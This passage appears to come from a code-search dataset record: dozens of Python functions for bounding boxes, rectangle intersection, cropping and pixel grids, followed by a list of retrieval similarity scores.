rects)\n # return set(((x1 + dx, y1 + dy), (x2 + dx, y2 + dy)) for ((x1, y1), (x2, y2)) in rects)", "def intersect(x):\n if len(x) < 2:\n return x\n\n # Make sure everybody have the same shape\n first_shape = tuple(x[0].shape)\n for pixmap in x[1:]:\n if first_shape != tuple(pixmap.shape):\n return []\n\n return [(np.prod(np.array(x), axis=0) > 0).astype(int)]", "def rect(rng, lines, columns):\n\n w = rng.randint(1, max(1, lines // 2))\n h = rng.randint(1, max(1, columns // 2))\n\n i = rng.randint(0, lines - h)\n j = rng.randint(0, columns - w)\n \n return i, j, w, h", "def _find_bboxes_in_rect(bboxes, left, bottom, right, top):\n result = (bboxes[:, 0] <= right) & (bboxes[:, 2] >= left) & \\\n (bboxes[:, 1] <= top) & (bboxes[:, 3] >= bottom)\n return result", "def constructRectangle(self, area: int) -> List[int]:\n w = int(area ** 0.5)\n while area % w:\n w -= 1\n\n return [area // w, w]", "def crop_image(image,list_coordinate):\n list_character = []\n lp_image = imutils.resize(image,width = 200)\n for bbox in list_coordinate:\n if bbox[0][0] == bbox[0][1] == bbox[1][0] == bbox[1][1]:\n break\n\n pts = np.array([(bbox[0][0],bbox[0][1]),\n (bbox[1][0],bbox[1][1]),\n (bbox[2][0],bbox[2][1]),\n (bbox[3][0],bbox[3][1])],dtype = \"float32\")\n \n warped = four_point_transform(lp_image,pts)\n\n # _,warped = cv2.threshold(cv2.cvtColor(warped,cv2.COLOR_BGR2GRAY),0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # warped = cv2.resize(warped,(12,28))\n warped = resize_and_pad(warped, (28,28), padColor= 255)\n warped = warped / 255.0\n\n # warped = warped[..., None]\n list_character.append(warped)\n return list_character", "def bound_shapes(contours):\r\n\r\n contours_poly = [None]*len(contours)\r\n boundRect = [None]*len(contours)\r\n centers = [None]*len(contours)\r\n radius = [None]*len(contours)\r\n for i, c in enumerate(contours):\r\n contours_poly[i] = cv2.approxPolyDP(c, 3, True)\r\n boundRect[i] = cv2.boundingRect(contours_poly[i])\r\n centers[i], radius[i] = cv2.minEnclosingCircle(contours_poly[i])\r\n \r\n return (contours_poly, boundRect, centers, radius)", "def _crop_region(polygons, left, bottom, right, top, precision):\n cropped_polygons = []\n for p in polygons:\n clipped_polys = clipper._chop(p, [top, bottom], 1, 1 / precision)\n # polygon, [cuts], axis, scale\n for cp in clipped_polys[1]:\n result = clipper._chop(cp, [left, right], 0, 1 / precision)\n cropped_polygons += list(result[1])\n return cropped_polygons", "def _recursive_rectangles(x, y):\n if x < 1 or y < 1:\n raise ValueError(\"Invalid input\")\n if x == 1 and y == 1:\n return {((0, 0), (1, 1)), }\n if x == 1:\n return _recursive_rectangles(x, y-1) | set(((0, j), (x, y)) for j in range(y))\n if y == 1:\n return _recursive_rectangles(x-1, y) | set(((i, 0), (x, y)) for i in range(x))\n return _recursive_rectangles(x-1, y) | _recursive_rectangles(x, y-1) | \\\n set(((i, j), (x, y)) for i in range(x) for j in range(y))", "def _find_largest_rects_in_hatch(x, y):\n if x < y: # Swap to iterate over the longest side.\n x, y = y, x\n\n rectangles = []\n for i in range(1, x): # Iterate over lower-edge vertices, ignoring corners\n a0, a1 = i, -i # Slope-intercepts for cross-hatch lines running through point (0, i)\n for j in range(1, x): # Iterate over upper-edge vertices, still ignoring corners\n b0, b1 = y - j, y + j # Slope-intercepts for cross-hatch lines running through point (y, j)\n x0, x1 = (a0 - b0) / 2, (b1 - a1) / 2\n if x >= x0 >= 0 and x >= x1 >= 0 and y > -x0 + a0 > 0 and y > x1 + a1 > 0: # All four corners are w/i grid\n 
rectangles.append(((i, 0), (j, y))) # Pairs of pairs\n # assert len(rectangles) == (2*y - 1) * (x - y) + (y - 1)\n return rectangles", "def gen_crop_area(x_res, y_res, dim):\n crop_area = []\n\n for x in range(math.floor(dim[0] / x_res)):\n for y in range(math.floor(dim[1] / y_res)):\n left = x * x_res\n right = left + x_res\n upper = y * y_res\n lower = upper + y_res\n crop_area.append((left, upper, right, lower))\n\n return crop_area", "def quadkeys_to_bounds(quadkeys: List[str]):\n tile_bounds = [\n mercantile.bounds(mercantile.quadkey_to_tile(qk)) for qk in quadkeys\n ]\n\n minx = 180\n miny = 90\n maxx = -180\n maxy = -90\n for tb in tile_bounds:\n minx = min(minx, tb[0])\n miny = min(miny, tb[1])\n maxx = max(maxx, tb[2])\n maxy = max(maxy, tb[3])\n\n return [minx, miny, maxx, maxy]", "def board_bounds(live_coords):\n if not live_coords:\n return False\n min_x = live_coords[0][0]\n max_x = live_coords[0][0]\n min_y = live_coords[0][1]\n max_y = live_coords[0][1]\n for i, j in live_coords:\n if min_x > i:\n min_x = i\n if i > max_x:\n max_x = i\n if min_y > j:\n min_y = j\n if j > max_y:\n max_y = j\n return [[min_x, min_y], [max_x, max_y]]", "def bbox_from_circle(img, circles):\n seg_imgs = []\n bboxes = []\n aux = img.copy()\n for i,el in enumerate(circles):\n bbox = circle_2_bbox(el['coord'])\n bbox = fix_bbox(bbox,aux.shape)\n cv.rectangle(aux,bbox[0],bbox[1],(0,255,0))\n bboxes.append(bbox)\n return bboxes", "def render(\n xs: np.array,\n ys: np.array,\n x_min: float,\n x_max: float,\n y_min: float,\n y_max: float,\n width: int,\n height: int,\n) -> np.array:\n assert xs.shape == ys.shape\n assert x_max > x_min\n assert y_max > y_min\n assert width > 0\n assert height > 0\n\n x_indices = discretize(np.array(xs), x_min, x_max, steps=width)\n y_indices = discretize(np.array(ys), y_min, y_max, steps=height)\n\n # Invert y direction to optimize for plotting later\n y_indices = (height - 1) - y_indices\n\n # Filter out of view pixels\n xy_indices = np.stack((x_indices, y_indices)).T\n xy_indices = xy_indices[\n (xy_indices[:, 0] >= 0)\n & (xy_indices[:, 0] < width)\n & (xy_indices[:, 1] >= 0)\n & (xy_indices[:, 1] < height)\n ]\n xy_indices = xy_indices.T\n\n # Assemble pixel matrix\n pixels = np.zeros((height, width), dtype=int)\n pixels[xy_indices[1], xy_indices[0]] = 1\n\n return pixels", "def get_patches(points, h, w, patches=[[450, 100, 10, 10], [450, 500, 10, 10]], min_valid_percent=0.75):\n pc_image = points.reshape((h, w, 3))\n pc_patches = []\n for patch in patches:\n possible_patch = pc_image[patch[0]:patch[0] + patch[2], patch[1]:patch[1] + patch[3]]\n possible_patch = possible_patch.reshape(possible_patch.size // 3, 3)\n possible_patch = filter_zero(possible_patch)\n if possible_patch.shape[0] > min_valid_percent * (patch[2] * patch[3]):\n pc_patches.append(possible_patch)\n return pc_patches", "def covering_box(boxes):\n x_min = np.amin([b.x for b in boxes])\n x_max = np.amax([b.x + b.width for b in boxes])\n y_min = np.amin([b.y for b in boxes])\n y_max = np.amax([b.y + b.height for b in boxes])\n cover = Box(x_min, y_min, x_max - x_min, y_max - y_min)\n return cover", "def __areas_to_pool(self, region_width, region_height, region_width_step, region_height_step):\n \n areas = [[(width_ind * region_width_step, height_ind * region_height_step,\n (width_ind + 1) * region_width_step if (width_ind + 1) < self.width else region_width,\n (height_ind + 1) * region_height_step if (height_ind + 1) < self.height else region_height) for width_ind in range(self.width)] for height_ind 
in range(self.height)]\n\n return areas", "def draw(list_rectangles, list_squares):\n\n art = turtle.Turtle()\n\n def set_position(x, y):\n art.penup()\n art.goto(x, y)\n art.pendown()\n\n def beauty_rectangle(width, height, art):\n art.begin_fill()\n for i in range(2):\n art.forward(width)\n art.right(90)\n art.forward(height)\n art.right(90)\n art.end_fill()\n\n for rectangle in list_rectangles:\n art.color(\"#800080\")\n set_position(rectangle.x, rectangle.y)\n beauty_rectangle(rectangle.width, rectangle.height, art)\n set_position(-1 * rectangle.x, -1 * rectangle.y,)\n\n for square in list_squares:\n art.color(\"#40E0D0\")\n set_position(square.x, square.y)\n beauty_rectangle(square.size, square.size, art)\n set_position(-1 * square.x, -1 * square.y)\n\n turtle.done()", "def extract(pixels, rmin, rmax, cmin, cmax):\n copy = blank_image(rmax-rmin, cmax -cmin) \n for r in range(rmin, rmax):\n for c in range(cmin, cmax):\n copy[r-rmin][c-cmin] = pixels[r][c]\n return copy", "def rect(coords : Tuple[int, int]) -> Tuple[int, int, int, int]:\n min_x = min([x for x, _ in coords])\n max_x = max([x for x, _ in coords])\n min_y = min([y for _, y in coords])\n max_y = max([y for _, y in coords])\n\n return (min_x, max_x, min_y, max_y)", "def del_rectangles(image, rects):\n for r in rects:\n cv2.rectangle(image,\n (r.x, r.y),\n (r.x + r.w - 1, r.y + r.h - 1),\n color=0,\n thickness=-1)", "def bounding_boxes(self, detections):\n bboxes = []\n while len(detections) > 0:\n det = detections.pop(0)\n merging = True\n while merging:\n merging = False\n pointer = 0\n while pointer < len(detections):\n if self.get_distance(det, detections[pointer]) <= self.max_distance:\n det = self.merge_boxes(det, detections[pointer])\n merging = True\n detections.pop(pointer)\n else:\n pointer += 1\n if det[4] >= self.min_area:\n bboxes.append(det)\n return bboxes", "def find_squares( contours, debug=False ):\r\n #=================================================================\r\n # The Minimum and Maximum rations for width vs height for the goal\r\n # based on experimental results goal is approx 1.5:1\r\n #=================================================================\r\n MIN_RATIO = 1.3\r\n MAX_RATIO = 1.8\r\n ret = []\r\n\r\n for shape in contours:\r\n x, y, w, h = cv2.boundingRect( shape )\r\n w_h_ratio = float( w ) / float( h )\r\n if debug:\r\n print \"Area\", (w * h)\r\n print \"Width \", w\r\n print \"Height\", h\r\n if MIN_RATIO < w_h_ratio and w_h_ratio < MAX_RATIO:\r\n ret.append( shape )\r\n\r\n return( ret )", "def find_obstacle_loc(self, obstacle_list):\n\n x_obst = []\n y_obst = []\n #x_obst_append = x_obst.append\n #y_obst_append = y_obst.append\n locs = []\n\n for x in obstacle_list:\n if x < self.width:\n x_obst.append(x*self.resolution + self.resolution/2)\n else:\n x_obst.append((x % self.width)*self.resolution + self.resolution/2)\n\n for y in obstacle_list:\n y_obst.append((y/self.width)*self.resolution + self.resolution/2)\n\n locs = map(lambda x: x, zip(x_obst, y_obst))\n\n return(locs)", "def obscure(rects):\n image = Image.open('/tmp/.i3lock.png')\n\n for rect in rects:\n area = (\n rect.x, rect.y,\n rect.x + rect.width,\n rect.y + rect.height\n )\n\n cropped = image.crop(area)\n cropped = obscure_image(cropped)\n image.paste(cropped, area)\n overlay = Image.open('/home/robin/Documents/source/scripts/src/locked.png')\n image.paste(overlay, tuple([(i-o)/2 for i,o in zip(image.size,overlay.size)]), overlay)\n image.save('/tmp/.i3lock.png')", "def extract_roi(reg_with_roi, ir_with_roi, 
reg_unmarked, ir_unmarked):\n roi_pos = np.where( reg_with_roi[:,:,2] == 255 ) \n \n x = list(roi_pos[0])\n y = list(roi_pos[1])\n \n #make a 2-d mask\n \n mask = np.zeros_like(reg_with_roi[:,:,1])\n mask[x,y] = 255\n \n _, cntrs = cv2.findContours(mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)[:2]\n\n reg_roi_list = []\n ir_roi_list = []\n \n #masks = []\n for cnt in cntrs:\n \n if reg_unmarked.ndim == 3:\n reg_unmarked = cv2.cvtColor(reg_unmarked, cv2.COLOR_BGR2GRAY)\n \n if ir_unmarked.ndim == 3:\n ir_unmarked = cv2.cvtColor(ir_unmarked, cv2.COLOR_BGR2GRAY)\n \n temp_mask = np.zeros_like(reg_unmarked)\n cv2.fillPoly(temp_mask, [cnt], (255,255,255))\n #masks.append(temp_mask)\n \n reg_roi = cv2.bitwise_and(temp_mask, reg_unmarked)\n ir_roi = cv2.bitwise_and(temp_mask, ir_unmarked)\n \n x, y, w, h = cv2.boundingRect(cnt)\n reg_roi = reg_roi[y:y+h, x:x+w]\n ir_roi = ir_roi[y:y+h, x:x+w]\n \n reg_roi_list.append(reg_roi)\n ir_roi_list.append(ir_roi)\n \n return reg_roi_list, ir_roi_list, cntrs", "def get_squares(x, y, width, height):\n return product(range(x+1, x+width+1), range(y+1, y+height+1))", "def bisect_rectange(numSplits, minlat, minlong, maxlat, maxlong):\n #initialize function variables\n longpoints = []\n latpoints = []\n extents = []\n\n #Get a list of the split lat/long locations in the rectangle\n for i in range(numSplits+1):\n latpoints.append( (minlat + ((maxlat-minlat)/numSplits)*i) )\n longpoints.append( (minlong + ((maxlong-minlong)/numSplits)*i) )\n\n #Loop through the line locations and create a list of sub-rectangles\n for latindex, latmin in enumerate(latpoints):\n for longindex, longmin in enumerate(longpoints):\n if latindex<(len(latpoints)-1) and longindex<(len(longpoints)-1):\n newextent = [latmin, longmin, latpoints[latindex+1], longpoints[longindex+1]]\n extents.append(newextent)\n return extents", "def crop(self, rect):\n maybe_cropped_area = self.to_bbox().crop(rect)\n if len(maybe_cropped_area) == 0:\n return []\n else:\n [cropped_area] = maybe_cropped_area\n cropped_origin = PointLocation(row=cropped_area.top, col=cropped_area.left)\n cropped_area_in_data = cropped_area.translate(drow=-self._origin.row, dcol=-self.origin.col)\n return [MultichannelBitmap(data=cropped_area_in_data.get_cropped_numpy_slice(self._data),\n origin=cropped_origin,)]", "def _find_largest_Rectangles_in_cross_hatch(x, y):\n if x < y: # Swap to iterate over the longest side.\n x, y = y, x\n\n rectangles = []\n for i in range(1, x): # Iterate over lower-edge vertices, ignoring corners\n a0, a1 = i, -i # Slope-intercepts for cross-hatch lines running through point (0, i)\n for j in range(1, x): # Iterate over upper-edge vertices, still ignoring corners\n b0, b1 = y - j, y + j # Slope-intercepts for cross-hatch lines running through point (y, j)\n x0, x1 = (a0 - b0) / 2, (b1 - a1) / 2\n if x >= x0 >= 0 and x >= x1 >= 0 and y > -x0 + a0 > 0 and y > x1 + a1 > 0: # All four corners are w/i grid\n rectangles.append(Rectangle((i, 0), (j, y), aligned_with_grid=False))\n # assert len(rectangles) == (2*y - 1) * (x - y) + (y - 1)\n return rectangles", "def cuts(self) -> list[list[int]]:\n if self._cuts is not None:\n return self._cuts\n width = self.width\n height = self.height\n screen_region = Region(0, 0, width, height)\n cuts_sets = [{0, width} for _ in range(height)]\n\n if self.map is not None:\n for region, order, clip in self.map.values():\n region = region.intersection(clip)\n if region and (region in screen_region):\n region_cuts = region.x_extents\n for y in region.y_range:\n 
cuts_sets[y].update(region_cuts)\n\n # Sort the cuts for each line\n self._cuts = [sorted(cut_set) for cut_set in cuts_sets]\n return self._cuts", "def surround(self, p):\n res = set([])\n if p.x + 1 < self.height:\n res.add((p.x + 1, p.y))\n if p.y + 1 < self.width:\n res.add((p.x + 1, p.y + 1))\n res.add((p.x, p.y + 1))\n if p.y - 1 >= 0:\n res.add((p.x + 1, p.y - 1))\n res.add((p.x, p.y - 1))\n if p.x - 1 >= 0:\n res.add((p.x - 1, p.y))\n if p.y + 1 < self.width:\n res.add((p.x - 1, p.y + 1))\n res.add((p.x, p.y + 1))\n if p.y - 1 >= 0:\n res.add((p.x - 1, p.y - 1))\n res.add((p.x, p.y - 1))\n return res", "def uniform_rect(mouth, face, width, height):\n if mouth is None:\n return None\n\n mc_x, mc_y = mouth[0] + 0.5 * mouth[2], mouth[1] + 0.5 * mouth[3] # Mouth center point.\n\n rect_bottom = mc_y + 0.5 * height\n\n rect_x = mc_x - 0.5 * width\n rect_y = mc_y - 0.5 * height - max(0, rect_bottom - (face[2] + face[3]))\n\n return [int(round(i)) for i in [rect_x, rect_y, width, height]]", "def clip_rect(selected_corners: np.ndarray, clipped_uv_verts: np.ndarray) -> np.ndarray:\n prev = selected_corners[-1]\n for corner in selected_corners:\n # interpolate line segments to the image border\n clip_prev, clip_corner = clip_segment_v3_plane_n(\n copy.deepcopy(prev), copy.deepcopy(corner), copy.deepcopy(planes)\n )\n prev = corner\n if clip_prev is None or clip_corner is None:\n continue\n a, b = clip_line_segment(clip_prev, clip_corner, K)\n clipped_uv_verts = np.vstack([clipped_uv_verts, a[:2].reshape(-1, 2)])\n clipped_uv_verts = np.vstack([clipped_uv_verts, b[:2].reshape(-1, 2)])\n\n return clipped_uv_verts", "def framewise_inside_rectangle_roi(\n bp_location: np.ndarray, roi_coords: np.ndarray\n ) -> np.ndarray:\n results = np.full((bp_location.shape[0]), 0)\n within_x_idx = np.argwhere(\n (bp_location[:, 0] <= roi_coords[1][0])\n & (bp_location[:, 0] >= roi_coords[0][0])\n ).flatten()\n within_y_idx = np.argwhere(\n (bp_location[:, 1] <= roi_coords[1][1])\n & (bp_location[:, 1] >= roi_coords[0][1])\n ).flatten()\n for i in prange(within_x_idx.shape[0]):\n match = np.argwhere(within_y_idx == within_x_idx[i])\n if match.shape[0] > 0:\n results[within_x_idx[i]] = 1\n return results", "def get_bounding_box(img):\n rows = np.any(img, axis=1)\n cols = np.any(img, axis=0)\n rmin, rmax = np.where(rows)[0][[0, -1]]\n cmin, cmax = np.where(cols)[0][[0, -1]]\n # due to python indexing, need to add 1 to max\n # else accessing will be 1px in the box, not out\n rmax += 1\n cmax += 1\n return [rmin, rmax, cmin, cmax]", "def get_dancefloor_area(self):\n cords = []\n\n x1 = self.coordinates[0]\n y1 = self.coordinates[1]\n x2 = self.coordinates[0] + self.width\n y2 = self.coordinates[1] + self.height\n if self.width <= 0:\n x1, x2 = x2, x1\n if self.height <= 0:\n y1, y2 = y2, y1\n\n for x in range(x1, x2):\n for y in range(y1, y2):\n if x % 20 == 0 and y % 20 == 0:\n cords.append([x, y])\n return cords", "def test_tiles_to_bounds():\n tiles = [morecantile.Tile(x=150, y=182, z=9), morecantile.Tile(x=151, y=182, z=9)]\n assert len(utils.tiles_to_bounds(tiles)) == 4", "def pixelcode(self):\n\n maxX, maxY = self.size()\n result = bitmap((2*maxX, 2*maxY))\n for x in range(maxX):\n for y in range(maxY):\n pixel = self.get(x,y)\n result.set(2*x,2*y, pixel)\n result.set(2*x,2*y+1, not pixel)\n result.set(2*x+1,2*y, not pixel)\n result.set(2*x+1,2*y+1, pixel)\n return result", "def rectIntersect(rect1, rect2):\n rect = np.zeros_like(rect1)\n rect[[0, 2]] = np.maximum(rect1[[0, 2]], rect2[[0, 2]])\n rect[[1, 3]] = 
np.minimum(rect1[[1, 3]], rect2[[1, 3]])\n return rect", "def drawRectangle(img, boxs_t, boxs_p, unseenName):\n img_p = img.copy()\n img_t = img.copy()\n for b in boxs_t:\n clas = unseenName[str(b[1])]\n x1, x2, y1, y2 = b[0][0], b[0][2], b[0][1], b[0][3]\n cv2.rectangle(img_t, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.putText(img_t, clas, (x1+10, y1+10), cv2.FONT_HERSHEY_TRIPLEX, 0.5,\n (0, 255, 0), 1)\n\n for b in boxs_p:\n clas = unseenName[str(b[1])]\n x1, x2, y1, y2 = b[0][0], b[0][2], b[0][1], b[0][3]\n cv2.rectangle(img_p, (x1, y1), (x2, y2), (255, 0, 0), 2)\n cv2.putText(img_p, clas, (x1+10, y1+10), cv2.FONT_HERSHEY_TRIPLEX, 0.5,\n (255, 0, 0), 1)\n\n return img_t, img_p", "def compute_bb(self):\n all_shapes = list(self.parts.values()) + list(self.edges.values())\n bbox_vertices = cascaded_union(all_shapes).envelope.exterior.coords.xy\n min_x = min(bbox_vertices[0])\n max_x = max(bbox_vertices[0])\n min_y = min(bbox_vertices[1])\n max_y = max(bbox_vertices[1])\n return [min_x, max_x,min_y, max_y]", "def order_rect(pts):\n new = np.zeros((4, 2), dtype=\"int64\")\n s = pts.sum(axis=1)\n new[0] = pts[np.argmin(s)]\n new[2] = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=1)\n new[1] = pts[np.argmin(diff)]\n new[3] = pts[np.argmax(diff)]\n\n return new" ]
[ "0.66037875", "0.6559397", "0.6555009", "0.65479845", "0.6528629", "0.6455227", "0.6453855", "0.64455384", "0.64104044", "0.6346816", "0.63399655", "0.6339705", "0.62987906", "0.6266192", "0.6236844", "0.61997765", "0.6193706", "0.6171467", "0.6139797", "0.6138508", "0.6129092", "0.608878", "0.6074923", "0.6074048", "0.6070478", "0.606193", "0.602708", "0.602708", "0.6014821", "0.5993206", "0.5988436", "0.59730476", "0.597267", "0.5959723", "0.595754", "0.59543693", "0.5954176", "0.595301", "0.5952399", "0.59333414", "0.5921701", "0.59122294", "0.5909409", "0.5907222", "0.5902377", "0.5901109", "0.58893126", "0.58868074", "0.58768284", "0.5876288", "0.58758223", "0.584782", "0.58456993", "0.5807183", "0.58068895", "0.5800318", "0.57900685", "0.57856506", "0.5783167", "0.57818735", "0.5775326", "0.57704216", "0.5765914", "0.57564783", "0.5746501", "0.574275", "0.5741624", "0.5734667", "0.5725761", "0.5724009", "0.5719628", "0.571714", "0.5711192", "0.57099694", "0.5705798", "0.5703253", "0.5702939", "0.5700136", "0.5695659", "0.56941706", "0.56909925", "0.5685008", "0.56839883", "0.5680029", "0.5678561", "0.5666794", "0.5662827", "0.56615484", "0.5656806", "0.5641095", "0.5634938", "0.5630097", "0.5629734", "0.5626206", "0.5620667", "0.561527", "0.561486", "0.56117773", "0.5602972", "0.5600348" ]
0.6178429
17
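A minimal standalone sketch of the rectangle-to-pixel expansion shown in the record above, assuming Pixel is a simple (x, y) named tuple and each exclude zone is an (x, y, width, height) tuple; the original class that defines Pixel is not part of this record, so that name is a stand-in.

from collections import namedtuple

# Assumed stand-in for the Pixel type referenced by the record's document.
Pixel = namedtuple("Pixel", ["x", "y"])

def build_list_of_excluded_pixels(exclude_zones):
    """Expand (x, y, width, height) rectangles into every pixel they cover."""
    pixels = []
    for x, y, width, height in exclude_zones:
        for row in range(height):
            for col in range(width):
                pixels.append(Pixel(col + x, row + y))
    return pixels

# Usage: a 2x1 zone at the origin and a 2x2 zone starting at (10, 5).
print(build_list_of_excluded_pixels([(0, 0, 2, 1), (10, 5, 2, 2)]))
# [Pixel(x=0, y=0), Pixel(x=1, y=0), Pixel(x=10, y=5), Pixel(x=11, y=5), Pixel(x=10, y=6), Pixel(x=11, y=6)]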
Check if two things have the same type.
def same_type(one, two): return isinstance(one, type(two))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _is_equal_same_type(self, other):\n return True", "def is_same(type1, type2):\n nake_type1 = remove_declarated(type1)\n nake_type2 = remove_declarated(type2)\n return nake_type1 == nake_type2", "def sametype(variable1, variable2):\n\n # Return the result\n return isinstance(variable1, type(variable2))", "def _is_equal_same_type(self, other):\n # id\n self_id = self.id\n other_id = other.id\n if (self_id and other_id) and (self_id != other_id):\n return False\n \n # bot\n if self.bot != other.bot:\n return False\n \n # description\n if self.description != other.description:\n return False\n \n # icon_hash\n if self.icon_hash != other.icon_hash:\n return False\n \n # icon_type\n if self.icon_type != other.icon_type:\n return False\n \n # name\n if self.name != other.name:\n return False\n \n return True", "def _values_of_same_type(self, val1, val2):\n if self.f_supports(val1) != self.f_supports(val2):\n return False\n\n if not self.f_supports(val1) and not self.f_supports(val2):\n raise TypeError(\n \"I do not support the types of both inputs (`%s` and `%s`),\"\n \" therefore I cannot judge whether the two are of same type.\"\n % str(type(val1)),\n str(type(val2)),\n )\n\n return type(val1) is type(val2)", "def _assert_input_object_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self.assertEqual(\n set(type1.fields.iterkeys()), set(type2.fields.iterkeys()))\n for name, t in type1.fields.iteritems():\n self.assertEqual(t.type_str(), type2.fields[name].type_str())", "def of_type(self, a):\n return type(a) == type(self.one)", "def _is_equal_same_type(self, other):\n # approximate_online_count\n if self.approximate_online_count != other.approximate_online_count:\n return False\n \n # approximate_user_count\n if self.approximate_user_count != other.approximate_user_count:\n return False\n \n # description\n if self.description != other.description:\n return False\n \n # discovery_splash_hash\n if self.discovery_splash_hash != other.discovery_splash_hash:\n return False\n \n # discovery_splash_type\n if self.discovery_splash_type != other.discovery_splash_type:\n return False\n \n # emojis\n if self.emojis != other.emojis:\n return False\n \n # features\n if self.features != other.features:\n return False\n \n # icon_hash\n if self.icon_hash != other.icon_hash:\n return False\n \n # icon_type\n if self.icon_type != other.icon_type:\n return False\n \n # id\n if self.id != other.id:\n return False\n \n # invite_splash_hash\n if self.invite_splash_hash != other.invite_splash_hash:\n return False\n \n # invite_splash_type\n if self.invite_splash_type != other.invite_splash_type:\n return False\n \n # stickers\n if self.stickers != other.stickers:\n return False\n \n # name\n if self.name != other.name:\n return False\n \n return True", "def check_type_compat(input_a, input_b):\n return return_family_type(input_a) is return_family_type(input_b)", "def is_type_equivalent(self, other):\n mine = self._replace_defaults()\n theirs = other._replace_defaults()\n\n def remove_base(dct):\n # removes base attributes in the phyiscal layer.\n basekeys = Column._replace_defaults(self).keys()\n for k in basekeys:\n del dct[k]\n\n remove_base(mine)\n remove_base(theirs)\n\n return type(self) == type(other) and mine == theirs", "def is_same_type_as_other(cls, other):\r\n return isinstance(other, cls)", "def is_consistent(self, other):\n return self.name != other.name or self.type is other.type", "def 
_values_of_same_type(self, val1, val2):\n if self.f_supports(val1) != self.f_supports(val2):\n return False\n\n if not self.f_supports(val1) and not self.f_supports(val2):\n raise TypeError(\n \"I do not support the types of both inputs (`%s` and `%s`),\"\n \" therefore I cannot judge whether the two are of same type.\"\n % str(type(val1)),\n str(type(val2)),\n )\n\n if not type(val1) is type(val2):\n return False\n\n # Numpy arrays must agree in data type and shape\n if type(val1) is np.array:\n if not val1.dtype is val2.dtype:\n return False\n\n if not np.shape(val1) == np.shape(val2):\n return False\n\n # For tuples we now from earlier checks that the data is homogeneous.\n # Thus, only the type of the first item and the length must agree.\n if type(val1) is tuple:\n return (type(val1[0]) is type(val2[0])) and (len(val1) == len(val2))\n\n return True", "def pod_equals(x, y):\n return type(x) == type(y) and x.__dict__ == y.__dict__", "def _assert_object_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self._assert_parent_types_equal(type1, type2)\n self.assertEqual(type1.class_descriptor, type2.class_descriptor)\n self.assertEqual(\n set(type1.fields.iterkeys()), set(type2.fields.iterkeys()))\n for name, field1 in type1.fields.iteritems():\n field2 = type2.fields[name]\n self._assert_fields_equal(field1, field2)", "def test_types_are_equal(self):\n self.assertEqual(True, comparator.types_are_equal(None, None))\n self.assertEqual(True, comparator.types_are_equal(True, True))\n self.assertEqual(True, comparator.types_are_equal(True, False))\n self.assertEqual(True, comparator.types_are_equal(int(), int()))\n self.assertEqual(False, comparator.types_are_equal(int(), str()))\n self.assertEqual(True, comparator.types_are_equal(str(), str()))\n self.assertEqual(True, comparator.types_are_equal(list(), list()))\n self.assertEqual(True, comparator.types_are_equal(dict(), dict()))", "def _assert_union_types_equal(self, type1, type2):\n self.assertEqual(type1.name, type2.name)\n self.assertEqual(type1.description, type2.description)\n self._assert_parent_types_equal(type1, type2)", "def __eq__(self, other):\r\n\r\n return type(self) == type(other) and self.ttype == other.ttype", "def is_identical(self, other):\n if self.is_input != other.is_input:\n return False\n\n if self.is_raw() and other.is_raw():\n return True\n if self.is_raw() or other.is_raw():\n return False\n return self.structure.is_identical(other.structure)", "def __eq__(self, other):\n return self.type_id == other.type_id", "def __eq__(self, other):\n if not isinstance(other, Type):\n return False\n\n return self.__dict__ == other.__dict__", "def __eq__(self: 'Cheese', other: 'Cheese') -> bool:\n return isinstance(other, Cheese) and self.size == other.size", "def test_equal_on_type_mismatch(self):\n a = objects.OpaqueObject(self.bytes_a, enums.OpaqueDataType.NONE)\n b = \"invalid\"\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __eq__(self, other):\n return (isinstance(other, self.__class__) and\n self.type == other.type and\n self.data == other.data)", "def test_equal_on_type_mismatch(self):\n a = Digest(\n hashing_algorithm=self.hashing_algorithm_b,\n digest_value=self.digest_value_b,\n key_format_type=self.key_format_type_b)\n b = \"invalid\"\n\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __eq__(self, other):\n return isinstance(other, self.__class__)", "def __eq__(self, other: Any) -> bool:\n return 
isinstance(other, Nothing)", "def __eq__(self, other: Any) -> bool:\n if isinstance(other, OutputSpec):\n return type_utils.get_canonical_name_for_outer_generic(\n self.type) == type_utils.get_canonical_name_for_outer_generic(\n other.type)\n else:\n return False", "def type_is_arg_of(type1, type2):\n if (not isinstance(type2, ComplexType)):\n return False\n return (type1 == type2.first)", "def __eq__(self, other) -> bool:\n if not isinstance(other, type(self)):\n return False\n for attribute in self.classes:\n if getattr(self, attribute) != getattr(other, attribute):\n return False\n return True", "def matches(self, other):\n if isinstance(other, type):\n return isinstance(self, other)\n\n return self == other", "def is_same_class(obj, a_class):\n return type(obj) == a_class", "def is_same_class(obj, a_class):\n return type(obj) == a_class", "def __eq__(self,other):\n try: return self.object==other.object and isinstance(self,type(other))\n except: return False", "def is_same_as(self, c_repr):\n return self == Type._from_c_repr(c_repr)", "def __eq__(self, other):\n\n return self.type == other.type and self.value == other.value", "def _check_type_compatibility(self, type_name1, type_name2,\n operation):\n if type_name1 != type_name2:\n raise TypeCompatibilityError(type_name1, type_name2, operation)", "def test_equal_on_type_mismatch(self):\n a = Certificate(\n certificate_type=self.certificate_type_a,\n certificate_value=self.certificate_value_a)\n b = \"invalid\"\n\n self.assertFalse(a == b)\n self.assertFalse(b == a)", "def __eq__(self, other):\r\n\t\treturn (self.type == other.type and self.value == other.value)", "def __eq__(self, other) -> bool:\n if not isinstance(other, NilpotentOrbit):\n return False\n if self.my_type != other.my_type:\n return False\n if self.lie_rank != other.lie_rank:\n return False\n if self.decorator != other.decorator:\n return False\n return self.my_diagram == other.my_diagram", "def is_same_class(obj, a_class):\n return (type(obj) == a_class)", "def __eq__(self, other: Any) -> bool:\n if isinstance(other, InputSpec):\n return type_utils.get_canonical_name_for_outer_generic(\n self.type) == type_utils.get_canonical_name_for_outer_generic(\n other.type) and self.default == other.default\n else:\n return False", "def is_same_class(obj, a_class):\n return(type(obj) == a_class)", "def is_same_class(obj, a_class):\n if type(obj) == a_class:\n return True\n else:\n return False", "def 